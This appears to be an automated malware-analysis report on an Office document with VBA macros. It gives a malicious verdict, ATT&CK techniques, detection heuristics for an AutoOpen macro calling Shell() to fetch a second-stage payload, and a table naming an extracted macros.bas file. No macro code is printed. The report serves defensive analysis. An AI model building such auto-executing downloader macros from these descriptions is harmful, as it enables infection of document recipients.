Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. An AutoOpen macro is set to run automatically when the document is opened, and it calls the Shell() function, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665580-0' is consistent with this downloader behavior.
Heuristics (7)

- ClamAV: Doc.Downloader.Valyria-6665580-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6665580-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12438 bytes | 285fa384f418ebce9c0850e6d163baebe20f93c28c9f0d40bda1db72a8f6e1a3 |
Preview script: first 1,000 lines of the extracted script